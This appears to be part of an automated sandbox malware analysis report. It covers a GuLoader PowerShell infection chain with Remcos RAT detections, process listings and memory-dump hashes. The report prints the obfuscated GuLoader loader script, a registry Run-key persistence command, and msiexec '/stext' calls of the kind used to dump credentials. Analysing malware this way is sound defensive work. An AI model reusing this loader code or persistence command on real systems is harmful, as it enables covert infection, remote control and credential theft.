($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin HjkdpsycsSpivfoffsoF rtrTerrsTortyPocknDemai,yttnthamg rodespu,rSter]Syll=ejer$ Br FobskuExporHon.cHypoa Nont.opieSyn d SedrOverr SneeTo.lfInterT esa.oldg lua FlabInteiPilklTareiAlt.tMis,y ogl ');$Gasartens60=Taborets 'Unfo$.luerFj leHimygSlvleGoallJe,nmaftesCrtosbilli Co gVulcsForlt Mad. TheDA tioKerawUdfrnFodblmi roSemiaYuked ,ycFUndeiBro lA.ioeV ks(Prin$Col ESci.n Klag D,ml eaneEs es DiskStena armrHklee gaarHidss Ace, Chi$ UpbUAcc dAquebBraclDephi fbkAr esRein) ald ';$Udbliks=$Thioneine;Politiseres (Taborets 'Reun$CampgSul.lSpitoCrabbPriva ExflMala:manuaDom,c RaahLus,r ,riOB,thMAntiA.eksT gotiKontNInvii HorcZo t= nc( kh,T ,tyeS leSQuattVa v-GldsPBrazaSkostfilthTran Bee$granUfacsdKokoBAlinl RafIE ickNot sSamm)Su a ');while (!$Achromatinic) {Politiseres (Taborets 'Meak$Kom gKalil ScroRemubYowla PrelGuar:BekrgR warF ise ForiEnd.t geo= Bun$WhamtCaferSolou anese v ') ;Politiseres $Gasartens60;Politiseres (Taborets 'QuivSKom tJohaA eflRDislTS nd-PrehsFoppLBarneQueseM,nipPama Reme4A ha ');Politiseres (Taborets 'Sand$ Ro Gkyp LCopro MatBHjlpA AnrLS dd:SynaAS,ilCResoh Na R L,sORakeMBen ABol t,lipIRe.anFjorI ubCbut,=.nch(En.lTCa.tETohesMel TMacr-DeplPShanAT,glT SnaHReup lu.k$SladuSprrd Samb,ammlMicrIF,enkFlusSRamp) ua ') ;Politiseres (Taborets 'A,sk$MomogDisal E ko DiaB BerANontL nge:agriiSkiemRethpCh llTi.beTur MFibrE MorNRegnTMuceaSadltKolliChroo AsyNEa lAmnstLLode= Sna$ VelGUndelDr tOBoonbIngeAIroklLy o:Snorn edtoP ckT Ga a TeltS.orE Afvs Ras+ dup+ cho%Fire$S arS KarARouttek ke rctLNo slKrybIAltsT,itabSardYeftee Af rIdeoNBjrne arpsTolv.OpsaCPi tOTok.USkamnIrreTPant ') ;$Engleskarers=$Satellitbyernes[$implementational];}$Budgettets=309680;$minification=29934;Politiseres (Taborets 'P el$ vergStuelChaeoMolabChr a utuLUsag:Semim ngeMilikP raA Sl N Ba IUnprK ritk SlueD gerBeclnK,ivEUngrsPa k Mou=Fed GratGMisoE udat Rus-ophtcUf eO ReanBaskTFilteVaquNHaentSved A fr$a rjuSa vdAtrib edeLEmbrIDummKBellS iva ');Politiseres (Taborets 'Togp$AfgigSt,klL kroF eebBillaDis l Not: erpAPodorAksecTrish uffaTypoe Bu oBa,dlPhen Afre= ska Re.u[Ba oSLgkuyindlsflurtSproeIntrmTr,n.TresCLegaoNifenMacuv etueSeksrIrontOutr]San :With:KonsFAirprResboTa km SciBRetraSpeasTy keim o6 Rst4ValuSAfsttNglerAdeliApnenNon g unk(Stre$U stmStane.rfakCerva ilbnSelviP aekSk ak ozee,cotrCentn BeveAftosSign) F.l ');Politiseres (Taborets ',ome$Zulkg T,klBi eoFdevBNds aUndeLFors:Dic.mP,edODe oR InctWedgAn,tuLombyWImpeIPredSUnfaE Re 1 Sub3Bilt3Anac sy b=Kloe Yeg [Pries AttyYellSBilltPhipeCarlm rat. ndeTS ane StaxHuskTProd.H,neESkulNPernCskaloCh iDExcrIS.mlnBeg.G.tje]Disl:perf:SyriA TenS eucc AriiPrgtiSpkh.Spu.GVa aeCabrT,iscs Am tNo pREv kIIschNP upg Fli( Fle$CeleAR.mor DiecDiplH othAUndeECa lOAndeLTele)A ch ');Politiseres (Taborets ',und$ KargJordl vaboEnsuBCahoaLastl Ima:HospCKd jOTracM Ch pSteaUIndet T,nEStalreg.sdmodvrSkifESiniV VokEUnimt Fol=A va$ ,enm T rO nscRSeksTNotiA stalF,stWDiptIFinhsAp ke ov1R od3U ha3 ies.BoetsMercuFinebP tasAndet KarR Lb ISk,dnUndeGKloe(Infr$ Fo b ProuleftdsmakGOvereB sttIdxlt N re ra,t Sn SA,fo,Cher$G,unmPhleI ovenBy liEl kFPr.fiUr gC.pacAScrutSoldi TiloThinNAfte)Fo r ');Politiseres $computerdrevet;"
                                                                                                      Imagebase:0x270000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2380669297.0000000008A80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2381021661.0000000009E8F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:09:03:13
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:09:03:28
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x1f0000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4525154442.000000002253E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4525112746.00000000224FD000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:9
                                                                                                      Start time:09:03:32
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
                                                                                                      Imagebase:0x790000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:10
                                                                                                      Start time:09:03:32
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:11
                                                                                                      Start time:09:03:33
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
                                                                                                      Imagebase:0xc10000
                                                                                                      File size:59'392 bytes
                                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 09:03:49
Start date: 17/10/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws"
Imagebase: 0x1f0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 15
Start time: 09:03:49
Start date: 17/10/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\avqzpodslp"
Imagebase: 0x1f0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 09:03:49
Start date: 17/10/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
Imagebase: 0x1f0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 09:03:49
Start date: 17/10/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
Imagebase: 0x1f0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 09:03:49
Start date: 17/10/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
Imagebase: 0x1f0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true
Strings
Memory Dump Source
• Source File: 00000002.00000002.2245659085.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
Similarity
• API ID:
• String ID: 'UY$'UY
• API String ID: 0-1762368797
• Opcode ID: 9fab3cd7a63365b09344522c9245ae7c97ce5dd3bb1e2ac01bbf232b0993b44b
• Instruction ID: 7af2bfca8203d06675e30d2401174a15c4a3bd6bead9dd2a606f9277f236e181
• Opcode Fuzzy Hash: 9fab3cd7a63365b09344522c9245ae7c97ce5dd3bb1e2ac01bbf232b0993b44b
• Instruction Fuzzy Hash: 13E1A23090CA8E8FEBA8EF28C8557E937D1FB54350F14426AE84DC7291DF7899548B86

Strings
Memory Dump Source
• Source File: 00000002.00000002.2245659085.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
Similarity
• API ID:
• String ID: 'UY$'UY
• API String ID: 0-1762368797
• Opcode ID: a3ac00eb796ba7b8477116738e5df2734ae25e49e22407042661f0251513208c
• Instruction ID: 36a14a5d54e32a917efa60a86e66752eec9c086ddb5907b855b03c628c3c0d73
• Opcode Fuzzy Hash: a3ac00eb796ba7b8477116738e5df2734ae25e49e22407042661f0251513208c
• Instruction Fuzzy Hash: 53E16E3091CA4D8FEBA8EF28D8557E937E1FB58350F00426EE84DC7295DB34A9458B86

Strings
Memory Dump Source
• Source File: 00000002.00000002.2245659085.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
Similarity
• API ID:
• String ID: 'UY$'UY
• API String ID: 0-1762368797
• Opcode ID: 92f9084bc1b45789d7a65e29f9eeca63dbcb87a304afe14234d7488520b82706
• Instruction ID: 8d150ab4229c06298f69eba4282bd70d05f79c6f19fc70c01c2b45eb6944783c
• Opcode Fuzzy Hash: 92f9084bc1b45789d7a65e29f9eeca63dbcb87a304afe14234d7488520b82706
• Instruction Fuzzy Hash: 60B1C43051CA8D8FEB69EF28C8557E93BE1FF55350F04426EE84DC7292CB3499458B86
Memory Dump Source
• Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4324628ec4b031851e338f8503d1e97720ae0c07509de435976410c886d8971f
• Instruction ID: 6fb560113288a8de714fa816bd41c85d60a08edd6ab98d53a030d176720d0f9a
• Opcode Fuzzy Hash: 4324628ec4b031851e338f8503d1e97720ae0c07509de435976410c886d8971f
• Instruction Fuzzy Hash: 87E1CF31E0EAC94FEBA6AB2868552747BE1EF56250F1800FBC05DCB1D3EA199C45C352

Memory Dump Source
• Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4aa1e4381c922ae31e438b2e8ffa645d1e75131c3a7d34d508f6301858d8710a
• Instruction ID: 4fc3ee858b1aacf5a85295d14c34b386c6a709b05c50df178286df9615842d56
• Opcode Fuzzy Hash: 4aa1e4381c922ae31e438b2e8ffa645d1e75131c3a7d34d508f6301858d8710a
• Instruction Fuzzy Hash: B7C10A31E0EACA4FEBA9AA2868556757BD1EF56360F0801FED04DC71D3FD18D805835A

Memory Dump Source
• Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 09a34830a8947995b90e5338d53d0bf7a6c38d67a43d86e7021efa799ab32484
• Instruction ID: f4fa76ccdfa089e68a90d14e7951458d34d0ee12f59356978cf4e04259e25cc9
• Opcode Fuzzy Hash: 09a34830a8947995b90e5338d53d0bf7a6c38d67a43d86e7021efa799ab32484
• Instruction Fuzzy Hash: 8CC12632E0DAC94FEBA5EA2868596757BE1EF56750B0801FBC04DC71D3EA18EC45C391

Memory Dump Source
• Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aee8912c5b0feb65a88d1ba460c96e2baf4ed67f69d7e48ac8a08437f4bbc951
• Instruction ID: 7f8e7449eee0a087bd86be33137a4a5591b8f1889102dbfad30549eac14d5d49
• Opcode Fuzzy Hash: aee8912c5b0feb65a88d1ba460c96e2baf4ed67f69d7e48ac8a08437f4bbc951
• Instruction Fuzzy Hash: D0B10231E0EACA4FEBA5AF2D68556B57BE1FF562A0B0801FAD00DC7193EE18DC058351

Memory Dump Source
• Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5ed837b61c5140ce5c11ce664b50ba03bec4e408650d7142f4bdf5e546265a8
• Instruction ID: 0b5d21ef2348d912c6c80ef7980c7735b196b723fdee03267725e7ac40e93041
• Opcode Fuzzy Hash: d5ed837b61c5140ce5c11ce664b50ba03bec4e408650d7142f4bdf5e546265a8
• Instruction Fuzzy Hash: 9391D82190E7C94FEB66AB7868555B4BFE0EF57360B0901FBD048CB1E3EA189849C352

Memory Dump Source
• Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3cd6c5f27f3c4cc80bfb0c412ced1bd1284df053421bdd99d2d5811101f63988
• Instruction ID: 6078d2b4363247c680b3fc8e1eba822ec745e7b71f98af83d0ff6b421c57d398
• Opcode Fuzzy Hash: 3cd6c5f27f3c4cc80bfb0c412ced1bd1284df053421bdd99d2d5811101f63988
• Instruction Fuzzy Hash: BB71E432E0DAC54FEB65EB2868552B8BBE1FF55761F1801FEC04DD7183EE28A8458742
Memory Dump Source
• Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 146c4e2299e34656a1f1509ca7d4cd63beedc987fa1e69842e7e91dd695342cc
• Instruction ID: f18f0c16e01726f00011a2ce6c8bd91ba9ea3b87d6b394847b2f987cbcd4f018
• Opcode Fuzzy Hash: 146c4e2299e34656a1f1509ca7d4cd63beedc987fa1e69842e7e91dd695342cc
• Instruction Fuzzy Hash: 4B513A31A0DAC95FEB59AB2868156B57BE1FF86360F0801FFD15EC31A3ED199805C391

Memory Dump Source
• Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8bbb6d3e5bcf9e9d33a2ba3dc6d8e6685441cba49bff277066688fe9927f1b83
• Instruction ID: 51564ccf5810918f5ea63cb61d92c740dc36cdcc08e7f1f7478f862957d725ec
• Opcode Fuzzy Hash: 8bbb6d3e5bcf9e9d33a2ba3dc6d8e6685441cba49bff277066688fe9927f1b83
• Instruction Fuzzy Hash: DB61E831E0DAC54FEB65EB2868552B8BBE1FF55361F1801FFC04997193EE18A8458352

Memory Dump Source
• Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c1108891373d66f1ca8fb1794767007bbecd71c7c8dbecc357d28c21bf12603d
• Instruction ID: 70ca7a93a5b29aa6934528936bb82ce4a898804a96236ef1c1b75438c72d0638
• Opcode Fuzzy Hash: c1108891373d66f1ca8fb1794767007bbecd71c7c8dbecc357d28c21bf12603d
• Instruction Fuzzy Hash: 7551E531D0DBC69FE765EB2868592A8BBE1FF55750F0801FEC04D97183EE28AC498752

Memory Dump Source
• Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 093caa1938d764224ff102ebe80af401b80e3548145b610907d09b87179c669a
• Instruction ID: 018efd5fff65ed487a53ba7eadfb26a9fcafc75963673b840fb97e0d471e3667
• Opcode Fuzzy Hash: 093caa1938d764224ff102ebe80af401b80e3548145b610907d09b87179c669a
• Instruction Fuzzy Hash: 7D511732A0DBC94FDB62EF2868596A4BBF0EF56354B0801FBC048C71D3DA189C45C392

Memory Dump Source
• Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5bc98d4256f3129c1e0edefab5706de10e08ef6b95653722eeb2619e03371857
• Instruction ID: e5d939e9dbc939ba2b45f48c1c1861a6190df35ecb09f19e34269fc9b2248220
• Opcode Fuzzy Hash: 5bc98d4256f3129c1e0edefab5706de10e08ef6b95653722eeb2619e03371857
                                                                                                        • Instruction Fuzzy Hash: 3A31E421D1EAD75FFBB5AA6928551B8AAD0FF072A0F5801FAD41DD31D3FE08E8044352
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8caca8029a8f9a89f2fb75bd166cc677ddb04580fdcc84704a397b82a873b7ab
                                                                                                        • Instruction ID: da50bda7a2c8483615920db08f342905137ecd9ee4c8437be074dba64f4f5288
                                                                                                        • Opcode Fuzzy Hash: 8caca8029a8f9a89f2fb75bd166cc677ddb04580fdcc84704a397b82a873b7ab
                                                                                                        • Instruction Fuzzy Hash: B621D231E1EA8A4FF7B5AA282495275B6D2FF452A0B5801FAD01DC7193FD18EC058249
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2245659085.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2e284daecc27ebcbf2bdc32f522113d2cf7634ea2cd23d2e09f81d5e5370ecf0
                                                                                                        • Instruction ID: 85bb152699af674fb165e5bf374b699d75492cf5fa623c9e48061d92d8c4125d
                                                                                                        • Opcode Fuzzy Hash: 2e284daecc27ebcbf2bdc32f522113d2cf7634ea2cd23d2e09f81d5e5370ecf0
                                                                                                        • Instruction Fuzzy Hash: 9331DC3082D64E9EFBB8AF18CC2ABF93294FF45395F40053AD80D861D2DB386985CB15
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f8a67ea66012b9edfa9623cf32b800438cca5f1f3d6268e690ccc406bd31368d
                                                                                                        • Instruction ID: 34f0f5a318e6015ef5abcfc9d74685b3a9e4b4a65ca5868bca239cd30725ef0d
                                                                                                        • Opcode Fuzzy Hash: f8a67ea66012b9edfa9623cf32b800438cca5f1f3d6268e690ccc406bd31368d
                                                                                                        • Instruction Fuzzy Hash: 2F210832B0DA584EFF58A91D78421F9B3D1EF85620B04047FC24BC3583EE15E81682C5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3b4b6ca21423dd0211dd3b1fb91f329e0f5c4d68555bc499cf77a4e5fbcf719e
                                                                                                        • Instruction ID: 184e83ad375a71827125048552522c951b58f8c935533d9c6198e34dab71f25a
                                                                                                        • Opcode Fuzzy Hash: 3b4b6ca21423dd0211dd3b1fb91f329e0f5c4d68555bc499cf77a4e5fbcf719e
                                                                                                        • Instruction Fuzzy Hash: AB110A33B0CA5C4EEB59AA2C74051F9B7D1EFC5631F4411BBC15EC3143EE15E85A8295
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 56fa232c5fc94eabf385297b2d6993387c865be9442e38e09e335f7a451317cd
                                                                                                        • Instruction ID: ebc79037871a16ad5d42a5b4966141154d883d90fc84bbe20eb6d2be50a19790
                                                                                                        • Opcode Fuzzy Hash: 56fa232c5fc94eabf385297b2d6993387c865be9442e38e09e335f7a451317cd
                                                                                                        • Instruction Fuzzy Hash: D321F622E0EAC65FE7A6AF3C28155746ED1FF576A1B0904FBD048DB1D3EC1C98494362
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2245659085.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                        • Instruction ID: 5581c1bbeeb35668f75aff93aa97cf07b4c35495046711a11288b2c77098a6b1
                                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                        • Instruction Fuzzy Hash: 4001677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4c8d9e4cc93a31caab5e722ceee6b444402c581d6a35f1090ca3cc2e4975d8cc
                                                                                                        • Instruction ID: da96316208ed7ccc70ec2d862b7ecb5a1a141cee1c20d3313a371b5184ef9891
                                                                                                        • Opcode Fuzzy Hash: 4c8d9e4cc93a31caab5e722ceee6b444402c581d6a35f1090ca3cc2e4975d8cc
                                                                                                        • Instruction Fuzzy Hash: 3EF0B431E0D9868FEBA5EA1C9895974B3E1EF2576070805FAC40DCB1D7D918EC808791
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0f16584d578ed2e09c4c31391a35ca8cd8545c2a385cc2dd2078bef468fd5d18
                                                                                                        • Instruction ID: 187647f0b2a5211cd67d1d86405370e4e0f13b9433ce30b09595a7fb8d716490
                                                                                                        • Opcode Fuzzy Hash: 0f16584d578ed2e09c4c31391a35ca8cd8545c2a385cc2dd2078bef468fd5d18
